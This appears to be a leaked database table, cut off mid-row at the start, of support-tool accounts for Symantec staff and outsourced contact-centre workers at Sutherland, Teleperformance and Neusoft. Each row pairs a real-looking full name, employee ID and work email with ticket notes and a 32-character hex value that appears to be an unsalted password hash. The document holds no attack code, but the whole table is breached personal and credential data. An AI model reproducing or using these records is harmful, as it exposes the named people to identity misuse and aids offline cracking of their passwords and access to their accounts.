blank>,9935e69db4b4e053c9d28c065a749409,C A,<blank>,086657,Jasmine,NULL,NULL,NUL
L
606c-42f9-9519-785cabdbbf8a,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,4ee62b037be8d55995b9550a73e31af3,Rehman,<blank>,075958,Rafeena,NULL,NULL,
NULL
e465-43d4-9749-9c78601b83e5,<blank>,INC213479,tools_id@symantec.suth.com,Sutherl
and,60393e56a79a388f9031fcf0eef48ea7,Ravindran,<blank>,075885,Rajesh,NULL,NULL,N
ULL
dd68-4a2c-aea6-5bebb36e5ced,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,4569a9cbff0e09ad32dbc5bde65fe7ca,Rajamohanan,<blank>,086738,Anoop Naduvil
ittel,NULL,NULL,NULL
7c77-45e3-af3a-f7ca7d9bcd7e,08/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,8a20d5d5f8a6f71b9b4d667cd599d56b,Carballo,<blank>,101398,Maricris,NULL
,NULL,NULL
8db8-4db7-80f2-52c5bb8a756c,CRQ000000541987--vmd--06/02/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,48b09b14d5736bfd69bad08a1bc1ea5a,Shaikh,<blank>,12474
5,Lubna,NULL,NULL,NULL
1ba8-4fed-98a5-a55c449d709f,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,178369fcc3d37c29a31f0a257fa3f6b4,Palivela,<blank>,109724,Sreenu,NULL,NULL,NULL
dd3f-4be5-8672-7c0baee9efc3,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,8de8ba2409ab5c61110a9c99a79a699d,Reddy Dalayi,<blank>,094891,Varaha Jaya Krish
na,NULL,NULL,NULL
ff06-408b-9709-8b64f3714547,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,romeorobertoluzadas_@symantec.com,CRQ000000247195 - PR - 4/28/2011,8d59d9eeb
e4f47b4485d4b35876436c1,Rovillos,<blank>,114738,Romeo Roberto Luzadas,NULL,NULL,
NULL
f1ca-4647-a789-4d30cf398563,CRQ000000247921,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,ef303b8e82f351064e09d61f47904064,Pusing,<blank>,115591,Benedick,NU
LL,NULL,NULL
d46f-499c-9cfc-2ebdcbcf300f,CRQ000000248650-VMD-03/05/11,000-000,tools_id@symant
ec.suth.com,Sutherland,9cb45adfb42179a70635f6304d771092,Sinha,<blank>,114719,Pra
ntik,NULL,NULL,NULL
17d2-4d0e-8353-6a78f7103bc8,SSS 23.08.10,INC180462,accounts@symantec.teleperform
ance.gr,TPG,7e06b46060d475d3a7902efc1b1df821,Bourmas,<blank>,052513,Tzimmy,NULL,
NULL,NULL
9f6a-4374-9df0-27e80ad17b94,CRQ000000253542 PBP 06/05/2011,<blank>,accounts@syma
ntec.teleperformance.gr,Teleperformance,8ae3517c751ec8434ea10a3540a6e483,Tzimas,
<blank>,115895,Evangelos,NULL,NULL,NULL
c829-449d-ba7f-364f430612db,SRB 24.08.2010,INC000000249136,Tools_ID@Symantec.Sut
h.Com,Sutherland,b5a5f2803e6a3c3daa027b1683f744e7,Ghosh,<blank>,105237,Shibu,NUL
L,NULL,NULL
5864-4fbc-9cc0-71e79a02d9f9,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,48b38547ea9e75802393ef67b2f9dff2,Hussain,<blank>,074423,Shakir M,NULL,NUL
L,NULL
744c-45fa-b7e8-7cabe3d5ff18,SRB 08.06.2010,INC190024,tools_id@symantec.suth.com,
Sutherland,8a6190458a10d77fea3cf1bf332d0e9f,Remeshan,<blank>,099540,Aswin,NULL,N
ULL,NULL
568f-4c74-b5a0-bd085eac9db2,<blank>,<blank>,peter_pergament@symantec.com,Symante
c,714de253a54d8a4aa0475e83ab52f6b6,Pergament,<blank>,peter_pergament,Peter,NULL,
NULL,NULL
6444-479b-ba64-a77ad1086bbc,CRQ000000346786-CLNP-28/09/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,fd124d25a2d03fad7716d8f48fcc78d3,N V,<blank>,120914,M
ithun Raj,NULL,NULL,NULL
b2b2-4c70-9086-45034860849f,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,e6a7bbd971529174f607c93ceb52ab55,Sam,<blank>,113381
,Nithin David ,NULL,NULL,NULL
6223-48a0-bc51-ceacfcdbbba1,"NA 10 Mar 2011, CRQ000000216519",000216519,Karthike
yan_MP@symantec.com,<blank>,7b3e5c21045ee063f7e3a102ec52aca7,MP,<blank>,113031,K
arthikeyan,NULL,NULL,NULL
33d9-4373-a039-628cf69172a1,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,5c90b88781ad69a246ce887ba87be060,Ganesamoorthy,<blank>,075942,Hannah,NULL
,NULL,NULL
b110-4207-bcbd-6c1236587192,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,6cca540144a77b7d5eccf5b2760d224a,Tharanirajan,<blan
k>,112979,Prasad,NULL,NULL,NULL
9dc0-4c9e-9623-603fae38edbd,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,4aca0ef75c15604b8e6ff01d890f315e,Esakkimuthu,<blank>,075944,Mahesh,NULL,N
ULL,NULL
81b1-43aa-8b9d-70a9e4a91f4f,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,marylindenbaldovino_@symantec.com,CRQ000000247190 - PR - 4/28/2011,6d3202926
15597e3fca821e0d4d941ad,Buere,<blank>,114724,Mary Linden Baldovino,NULL,NULL,NUL
L
2190-42bf-9275-b83db3222eb0,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,jhocengracecalugay_g@symantec.com,CRQ000000247204 - PR - 4/28/2011,894095126
fa0c026a67aa069184da708,Ganiron,<blank>,114725,Jhocen Grace Calugay,NULL,NULL,NU
LL
d4f3-4120-9b30-64988c7bebec,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,ae351ca052b1b1948e3ea2ed243e1644,Fiaz,<blank>,075948,Mohammed,NULL,NULL,N
ULL
6346-4878-b8ca-540b542753fe,SRB 25.06.2010,INC202269,tools_id@symantec.suth.com,
Sutherland,58e4506c04b389dfeaeedcbf8c539533,Ganta,<blank>,090921,Srinivas,NULL,N
ULL,NULL
ab3b-48f8-b627-dc1de557310c,REQ000000787622 PBP 06/05/2011,<blank>,nh.symantec@t
eleperformance.com.ar,Teleperformance,084ea9f7283a9891cd522a2be637a51b,P\xe9rez,
<blank>,115540,Marcelo,NULL,NULL,NULL
8307-48f1-8baa-d1b335380ae7,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,3314cd00415f3979536df101d61b05d0,James,<blank>,086600,Jithin,NULL,NULL,NU
LL
0eee-4918-b6e4-49e1bef7b7cf,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,668b7baa5fbc0ecc53b6784c46a088e3,Diomampo,<blank>,10179
4,Alexander,NULL,NULL,NULL
b737-4537-8025-fa3c17149fbb,CRQ000000220585-VMD-17/03/11,000-000,tools_id@symant
ec.suth.com,Sutherland,365b86156986d89c4b83c79a535a0878,Krishna,<blank>,113844,M
urali,NULL,NULL,NULL
4a43-4ad5-8f95-efd6cf089328,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8d74b17c08a7da9843b043ed6f48a64a,Micabayas,<blank>,076077,Marvin,NULL,NUL
L,NULL
06c3-4f77-aab1-f20d699e7d89,CRQ000000221934 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,571a2454e86d574f5c48a83c0f7ed2b9,Sathyan,<blank>,114001
,Nimsha,NULL,NULL,NULL
91bd-46a4-9711-8b2e237fb8a5,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,9684441799563a6645f9578a48b59a59,Ballener,<blank>,08577
4,Mandel Villabroza,NULL,NULL,NULL
04f0-4c34-8718-160fdc7b1693,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,0088f401c84867eb37489961e93bb6e5,Pravin,<blank>,074497,James E,NULL,NULL,
NULL
c117-4035-b20d-09f4a7d32a6d,CRQ000000413475--VMD--21/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,9850dc4224b52c7df69015483c3e4ad8,N,<blank>,122511,Aru
n,NULL,NULL,NULL
293d-467f-b3fb-78cb1de53a10,CRQ000000206888 -vmd-23/02/11,000-000,tools_id@syman
tec.suth.com,Sutherland,b6afd8f59846f9892a6dc43a1ade20f7,S,<blank>,113273,Elizab
eth,NULL,NULL,NULL
483e-433e-9d0f-35afb2daa0cc,SRB 18.06.2010,INC000000197662,tools_id@symantec.sut
h.com,Sutherland,44f6b10100c10cf57ce1947f2f0a9f5e,Ebay,<blank>,085790,Josie,NULL
,NULL,NULL
6985-4fc7-89d9-401f4ac0a684,<blank>,<blank>,Kosalaraman_K@symantec.com,CRQ000000
315323 - PR - 5th August 2011,9e387283e8b68c59f2cd7a9452a3a7e5,K,<blank>,118041,
Kosalaraman ,NULL,NULL,NULL
4461-446c-b1c1-cf68a6f5a404,CRQ000000208137-vmd-25-02-11,000-000,tools_id@symant
ec.suth.com,Sutherland,85cfd18c78a8afffc26888f9faf6af72,Konduri,<blank>,113364,V
ikram,NULL,NULL,NULL
2297-4ee3-9023-04a6e2afeb94,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,628cca303a39eaa6512faa776cd37bd5,P,<blank>,096025,Arun,NULL,NULL,NULL
7890-4914-84b9-fad018a89ca3,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496404,bc969469aa652954c385894f6941c575,Pillai,<blank>,1238
33,Srilata,NULL,NULL,NULL
93cd-4f21-a211-8727730c8f8a,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,4d031c4c756324a5aa7c46b3f157a11e,Khan,<blank>,101906,Javed,NULL,NULL,
NULL
67f0-46bb-9ad0-ec4caaf1458f,08/06/2010 - SPJ,EMPROV,symaccount@neusoft.com,Neuso
ft,d2e777d8bcabe7e376484fcda0b3e544,Jin,<blank>,105860,Yan,NULL,NULL,NULL
5396-45cf-b212-d51fcd22353d,<blank>,<blank>,Ajay_Sharma@symantec.com,CRQ00000031
7124 - PR - 9th August 2011,68b6c576eb0e57a0d162d96926973c06,Sharma,<blank>,1181
42,Ajay,NULL,NULL,NULL
25f3-470a-931a-6f5cbf144fd8,CRQ000000321898--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,6db23151c008c2f6cebb504406be0519,Dsouza,<blank>,11961
6,Robbie Edward,NULL,NULL,NULL
aa9e-4661-9d1a-77ddfc46f829,CRQ000000321901--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,4ba88ad22ae4929c9af1541c71353156,J,<blank>,119617,Ram
ya,NULL,NULL,NULL
721b-4634-92da-a94f745a0863,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,b0d659792f583e462c4c28db6345de18,Kasar,<blank>,101918,Wungreichon,NUL
L,NULL,NULL
c651-453d-802b-4a18e8229d7f,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,ec648dd1f51e11fdaed98cca8b969a83,Shanmugan,<blank>,102025,SankaraPand
ian,NULL,NULL,NULL
8879-4dd8-93ce-9af5278364a6,CRQ000000321944--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,e0e89bf07a809ea2dac8ac27ed4a4c2d,Alias,<blank>,119630
,Mark Andrew Paradela,NULL,NULL,NULL
368b-449b-9ee7-9cb8f79c15e4,25/03/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,6d161fac5faf8b4ccf70f58d2718bb3b,Nautiyal,<blank>,075778,Ankush,NULL,N
ULL,NULL
b93e-4386-8953-30f526e84338,CRQ000000190835-BKK,<blank>,SankarGanesh_R@symantec.
com,<blank>,8b146e97f2fc4a3686e5e1a6a5ba6bf8,R,<blank>,111855,Sankar Ganesh,NULL
,NULL,NULL
b8ab-46df-bc83-746eebe2d326,nam-08-19-2010,CRQ000000111485,tools_id@symantec.sut
h.com,Sutherland,f4ed6b938f40f401773fbd55a2501029,Udayashanker,<blank>,108214,Sa
agar,NULL,NULL,NULL
52ed-4e77-80d4-8992e2679bf4,SKK - 1/2/2011 - CRQ000000193616,<blank>,tools_id@sy
mantec.suth.com,<blank>,f547e8acc15d7f1d29206449f41f8c49,Varma,<blank>,112661,Ki
shore,NULL,NULL,NULL
74bb-4012-964b-20ea523a0521,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,e5180f8b826713de6a63b578bf3582ea,M,<blank>,074127,Sathish,NULL,NULL,N
ULL
9b09-4626-a07f-d965ffaf5258,CRQ000000267270 - PR - 5/30/2011,<blank>,tools_id@sy
mantec.suth.com,<blank>,ce1e09c1e56f52e92e2cd1379e89ec53,Thakkar,<blank>,075786,
Vikas Mahendra,NULL,NULL,NULL
f072-40dd-822f-26f244f08104,bpr-07-07-10,INC207496,tools_id@symantec.suth.com,su
therland,54a254889ca34d3f088810080492a362,Sugunan,<blank>,074372,Sooraj,NULL,NUL
L,NULL
0d65-4c85-9135-23e8163ccb2d,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,780b7321dd2466f398e463a80555ae3d,A,<blank>,112763,Chaita
nya,NULL,NULL,NULL
e708-4ac4-8017-be6b1884bb87,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,a63f21c4740296103badb60cd46f2b09,Kumar,<blank>,112765,Sa
njay,NULL,NULL,NULL
2405-44c1-b677-612eb0b7048e,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,cdd03a64c8520efe2b1dc12b1cd42133,Jamon,<blank>,104999,An
zyl Faith Balate,NULL,NULL,NULL
45a9-40cc-b5bd-621bc3eb403d,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,912267ea5925511205036b2d15435996,Deshmukh,<blank>,098112,PrashantBaji
rao,NULL,NULL,NULL
7abe-43b4-bcda-f0a9c4a80796,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,98d76bbc91c17caf314be48124858790,Khan,<blank>,098131,NavedRashid,NULL
,NULL,NULL
ee45-4a2a-80b9-eda94b420ae8,SRB 08.06.2010,INC190024,tools_id@symantec.suth.com,
Sutherland,35f9bc12540a83ca0f8bb83048e9b969,Kalathil,<blank>,099549,Prajith,NULL
,NULL,NULL
5b67-4e9d-9961-01a6b9de36db,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,538ca45e0f18430a858d7c191b583855,Vettikal,<blank>,098140,Kavitha,NULL
,NULL,NULL
7331-4637-8f54-c1067ba08931,sms 29,INC204728,tools_id@symantec.suth.com,Sutherla
nd,a69fe3f90c37b5afbdeaa02b2799f9fc,Blessing,<blank>,089315,Winfred,NULL,NULL,NU
LL
2917-40da-b5a5-cb44fab75e8b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,42195bf490538116b07444607e9a49f7,Geronimo,<blank>,096054,Arlene,NULL,NULL,NULL
567b-4d68-bdf9-36896d0de977,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,f4fd669dbf243727b9c5c4a5fd47d4e1,Dairo,<blank>,096038,Carla ,NULL,NULL,NULL
33a3-4b67-bd09-1892f74ea54a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,e39b87116d65c4b867ba50bb593db8d6,Canieso,<blank>,096053,Janino,NULL,NULL,NULL
effa-4570-964b-43af752c8628,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6b08592fc655191f755a4a7bb44e1109,Flores,<blank>,096039,Pauline,NULL,NULL,NULL
7e48-4e0e-8404-c7bf5bd7b6e1,bpr-06-07-10,INC207496,tools_id@symantec.suth.com,su
therland,775af33c33a0b7d3414c880001672224,S,<blank>,074404,Deepti,NULL,NULL,NULL
6984-4a80-b996-6358a2e30d57,bpr-26-03-10,CRQ53899,Imran_Khan3@symantec.com,syman
tec,b7bf05d93bd90cc6401a329afe73a3a4,Khan,<blank>,073320,Imran,NULL,NULL,NULL
a643-4e6b-8596-7a18123ccb3e,13/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,0d766acc68b985ff9b0bbfb295d9205c,BalakrishnanLucy,<blank>,105223,Saran
,NULL,NULL,NULL
e685-4ce1-a4a1-73898b0a7bc7,sms 29,INC207496,tools_id@symantec.suth.com,sutherla
nd,67a1e79990c0a3f019e94618d08c319c,Singh,<blank>,090652,Ankur,NULL,NULL,NULL
e2db-4de1-9ba3-29192c769010,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,1cea898a040604508f1b1f18bf8b28ad,P,<blank>,073934,Sridhar,NULL,NULL
,NULL
3c94-4df6-9376-33979648300e,SMS 05.10.2010,<blank>,tools_id@symantec.suth.com,Su
therland,68beed43bbb5b04f639a4c48ba57c3a8,Balasubramaniyan,<blank>,109192,Karthi
k,NULL,NULL,NULL
85b0-4bc4-92c3-8b8197512cb2,<blank>,<blank>,symantec_2nd_maa@tp-tec.nl,TPH,5eec2
231c83f95e9e6c17140d1d25750,Bok,<blank>,083859,Stephanie,NULL,NULL,NULL
bcef-4b36-a7b0-d549ce6c717a,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,80388d2c2c69d78472489da3070254d1,Malaki,<blank>,085796,
Rodel Honor,NULL,NULL,NULL
859c-48e5-bb5d-34c5ee57ac2f,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,b73f83ffdaac3ea8ae48300be7bd6dbb,V,<blank>,075370,Prabhu,NULL,NULL,NU
LL
4277-4977-b2e0-89e9b2241c79,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,bda18ee272af4b5d3b5d9e4a5c614e37,Sundaram,<blank>,086263,Balachander,N
ULL,NULL,NULL
5bea-4636-ad78-acbea24bb41a,VB=05/10/2010,<blank>,tools_id@symantec.suth.com,<bl
ank>,b6eeafbb82203a4f48a5926b472dd550,Amalakanti,<blank>,109331,Poornima,NULL,NU
LL,NULL
2d63-4919-9fa8-7b6982703ea7,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
592938 - PR - 15th March 2012,84713213e2c7c79cb0f3044bc050df20,Thakkar,<blank>,2
22639,Prakash ,NULL,NULL,NULL
f82a-4c05-ac14-7fb8b5aadcd6,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c72044001d180b833e6018012a63d198,Pabico,<blank>,096046,Rowell,NULL,NULL,NULL
c13c-4e94-a8b8-b8c7e3602eb9,bpr-06-07-10,INC207496,tools_id@symantec.suth.com,su
therland,076a247acbb1c90456744f78d553ded7,R,<blank>,075376,Rajesh,NULL,NULL,NULL
614b-4a4b-891d-3a2c6effee1b,CRQ000000322884-CLNP-18/08/2011,000-0000,charlineaba
yon_valle@symantec.suth.com,Sutherland,664065a720440f563285a41855a886c8,Valles,<
blank>,119731,CharlineAbayon,NULL,NULL,NULL
d02b-434b-bf4f-a3d2e61d366d,bpr-06-07-10,INC207496,tools_id@symantec.suth.com,su
therland,c7e40dce4967b7f13369dd1325764762,Sathiyaseelan,<blank>,074078,Thanasing
h,NULL,NULL,NULL
98da-4bbc-a794-d431029b3f9f,SRB 08.06.2010,INC190024,tools_id@symantec.suth.com,
Sutherland,346ccddcf7aee81c6909d94f8178eb61,Madhu,<blank>,099543,Harish,NULL,NUL
L,NULL
ff4c-4024-aa3b-1ee7d7f2bc5c,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,e615ce0eff49977158b8cb6eed5091f1,Shaikh,<blank>,074752,Imran,NULL,NULL
,NULL
0320-456b-94e8-f8bb8ac2ef6a,"CRQ000000592925 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,6af9e82d53f30085c93ce0488fab00ef,Saigal,<blank
>,222483,Subhash,NULL,NULL,NULL
1c0e-4343-9c89-f990edcc044b,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,fc66d25e84f314b833e0447ae6d061a1,T,<blank>,075955,Kamal,NULL,NULL,NUL
L
e83f-4338-b28b-066b48a6f89f,bpr-07-07-10,INC207496,tools_id@symantec.suth.com,su
therland,f6ddc837a9c1d971c26db7f9eec2055b,Subramanian,<blank>,086882,Venkat,NULL
,NULL,NULL
da03-477f-a5b9-ab1414ece298,<blank>,INC213479,tools_id@symantec.suth.com,Sutherl
and,8defbc204997883b2b12763da3324cc8,Prabhu,<blank>,075807,lalit,NULL,NULL,NULL
f38b-470f-9cb5-ce5ada2cef91,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8ba87d8cb90b8d8f870a704aafec32b5,Paulo Tan,<blank>,080971,Nino,NULL,NULL,
NULL
f438-4e0b-af63-5c6804b35670,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,f81326aacf008e17ccc4b3d16f8dd750,Christopher Thomas,<blank>,075385,Tony,N
ULL,NULL,NULL
52f5-42d4-8b20-08ff698b65a8,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,7e9f018e702b21f4e97c1909c3b41109,Mae,<blank>,075470,Cherry Miguel,NULL,NU
LL,NULL
dcf5-4e11-9839-e6448858bbae,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,bc8100c305e5bf3c81240a47d2fbd09f,Roxas,<blank>,096040,Zenaida,NULL,NULL,NULL
0a0c-4dcb-9898-914e2bd0d190,CRQ000000285684--VMD--23/06/11,000-000,tools_id@syma
ntec.suth.com,Sutherland,a62f33da5ccd78a4dc6207f4a287f176,Siddiqui,<blank>,11759
6,Tawquir Mohammed,NULL,NULL,NULL
d23f-40f0-8ca4-031c3ac20b56,CRQ000000285650--VMD--23/06/11,000-000,tools_id@syma
ntec.suth.com,Sutherland,6b7d828881a54d2562d7f185157b97b5,Ansari,<blank>,117605,
Salim,NULL,NULL,NULL
cbdf-435c-8c8f-20a0db59739a,CRQ000000413834--VMD--21/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,e6084748009aafb5100877236e5c2aee,Jose,<blank>,122512,
Dino,NULL,NULL,NULL
3e3c-4ac0-8b16-fdc5a4ade3a6,sms 29,INC207500,tools_id@symantec.suth.com,Sutherla
nd,31785bc750f0053b3a0affbcf44f0ca2,T,<blank>,074586,Nidhishan,NULL,NULL,NULL
93b5-411c-b630-7a5c585513ab,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,aa187aba5690cb3cd746f67e791605b5,Varma,<blank>,075900,Sahil,NULL,NULL
,NULL
cc5d-4a2c-b100-993ed670429b,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,be4562161f2beae61614cb3f3d4e5086,Waters,<blank>,076111,Emmanuel,NULL,
NULL,NULL
be8f-45f9-aa79-26344fe9ad4a,nam-08-19-2010,CRQ000000111512,tools_id@symantec.sut
h.com,Sutherland,2002524dd302c7c2b5e1ea8b3c738ff3,Fanovard,<blank>,108223,Sonia,
NULL,NULL,NULL
67ea-4f1a-9b04-938698de2aae,<blank>,INC213479,tools_id@symantec.suth.com,Sutherl
and,ceb450af1f1ac31be3295ff1f3087608,Suresh Kulkarni,<blank>,075815,Meghana,NULL
,NULL,NULL
cd90-452c-9049-3d577ffceda0,<blank>,<blank>,joshua_huck@symantec.com,Symantec,e1
23efb9b6cc99e02b9cc42255a3eb73,Huck,<blank>,joshua_huck,Joshua,NULL,NULL,NULL
7223-47c1-ab9a-389483ca903f,<blank>,<blank>,robert_brelsford@symantec.com,Symant
ec,1104e8c0ed3751534803bdb751d92027,Brelsford,<blank>,robert_brelsford,Robert,NU
LL,NULL,NULL
9233-4d8d-af33-0a777f760a84,<blank>,<blank>,glenn_bosshardt@symantec.com,Symante
c,9debc76a113d36c95f1197dd1350b75a,Bosshardt,<blank>,glenn_bosshardt,Glenn,NULL,
NULL,NULL
f60f-4872-8908-98e86e9aa401,<blank>,EMPROV,Tools_ID@Symantec.Suth.Com,<blank>,96
0c7129ceca83778849576c3eeedea0,Rgupathy,<blank>,102087,Jeyadurai,NULL,NULL,NULL
f1f7-4630-9a24-5379d9a0bfc5,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b4c0d60e9cfec3de6d5688211eed10d1,Vijayaraj,<blank>,096023,Babu,NULL,NULL,NULL
e37d-4338-9624-1621778b2f1a,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,bc532ffbe846299b5381835230a225ad,Peyyati,<blank>,074019,
Kesari Prakash,NULL,NULL,NULL
40f0-4b64-bf5a-b34abeff6795,CRQ000000228849,<blank>,tools_id@symantec.suth.com,K
SC-03/29/2011,c1f5e9c0d3dda33a5b2d39f9bbbb873d,Shaik,<blank>,108983,Sattar,NULL,
NULL,NULL
a1f2-4435-97b0-eeb68b9c50b0,<blank>,<blank>,Sheldon_Fernandes@symantec.com,CRQ00
0000230165 - PR - 4/1/2011,8cde2558714f0dcc2b7cf852eaa0b7dc,Fernandes,<blank>,10
9135,Sheldon,NULL,NULL,NULL
599c-4e9c-b832-42d2a2d9cb4d,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,ff91610f7c97a864e3d1be892f70eaa3,Yashwanth Krishna,<blank>,075956,Bhu
vanigiri,NULL,NULL,NULL
c56b-480a-a64d-8c520753c46c,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,4aec404a112b6cac164ebcb78444408b,M,<blank>,074126,Kiruba,NULL,NULL,NU
LL
188d-4e13-a7f2-440fa9ab9718,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,4d953ad7091eb91d3f80e0720032a2df,P,<blank>,096024,Ratheesh ,NULL,NULL,NULL
7580-45f5-975a-5b3bcf8020dd,<blank>,<blank>,nicholas_townsend@symantec.com,Syman
tec,8f31080f2681c8de42c2462dd8fc3b45,Townsend,<blank>,nicholas_townsend,Nicholas
,NULL,NULL,NULL
9330-4871-9f08-e8bf3d93102b,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,0b18f661890541ce065ff4f4fdd1d614,U C,<blank>,086763,Dhanoop,NULL,NULL
,NULL
dfaf-4929-8ea9-5ceeda5f554c,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,ebe21fba5d7c3737451f634a5090bcfb,Venkatesalu,<blank>,074710,Jayalaksh
mi,NULL,NULL,NULL
a2ef-4e3e-8577-b9c95b548681,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,0b43774efa29097631fe3f9a0fb42d58,Bojanapati S,<blank>,074433,Ashwanth
Rao,NULL,NULL,NULL
bf35-490c-a2f6-cd985208e89d,CRQ000000346778-CLNP-28/09/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,0715d23f28f2d37b87619dcc5e9f83af,N,<blank>,120913,Net
hra Priya,NULL,NULL,NULL
8edb-472f-89cb-0ac32f36cf56,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,6af83b938a6dc64ffa6b310c11d40329,Ravindran,<blank>,117070,
Krishnanunny Athiyarath,NULL,NULL,NULL
8640-4c61-b44e-952ddab11b1a,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,e4871c970931d54b012ff5569d254e43,Gopal,<blank>,075660,Ve
lu,NULL,NULL,NULL
a656-4b10-87fe-575e55589886,sms 29,INC213497,tools_id@symantec.suth.com,sutherla
nd,de2a64410b52984d5eb13017b7729425,S,<blank>,074646,SivaKumar,NULL,NULL,NULL
2735-427d-b024-77ed3f7e2b54,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,f5b96379cd76b3719fbae0f1c3b1cdae,Uchil,<blank>,075447,Akhil,NULL,NULL
,NULL
2324-4156-bb7d-7992130c9bc0,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,790463769f4666fa13ff2bb9e5a9b799,V,<blank>,075367,Gautham,NULL,NULL,N
ULL
8621-41ad-b676-7f79cf42375c,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,5689dbcebf22f230c89082a93269909f,Victoria Dy,<blank>,07
5482,Maria,NULL,NULL,NULL
d4a7-468e-9c1c-c7e0d1efa9bb,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,d5386e5cd24405780fe7e1464b6d49bb,P,<blank>,074434,Vipina,NULL,NULL,NULL
a5fd-44b9-a4a7-09718be3dcd0,<blank>,<blank>,nicholas_caudill@symantec.com,Symant
ec,c0a51feaaeee3364fda4c6f27192246e,Caudill,<blank>,nicholas_caudill,Nicholas,NU
LL,NULL,NULL
8319-43cf-8813-3a0211a5e4d9,SSS 25.05.10,EMPROV,tools_id@symantec.suth.com,suthe
rland,05ec84db95e073ffb2e6bb23dd524958,R S,<blank>,099601,Krishnan,NULL,NULL,NUL
L
9a9f-48ec-acf9-1fd101d3bd04,CRQ000000298996--vmd--12/07/2011,000-000,Janakiraman
_V@symantec.com,Symantec,e9e478bc006a7495b917594a2cd1518d,V,<blank>,117214,Janak
iraman,NULL,NULL,NULL
84f5-4b43-b11f-e134f72b4a12,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b4d33199b4f7bb1c5701c3f3b4b21f12,KumarS,<blank>,096026,Sathish,NULL,NULL,NULL
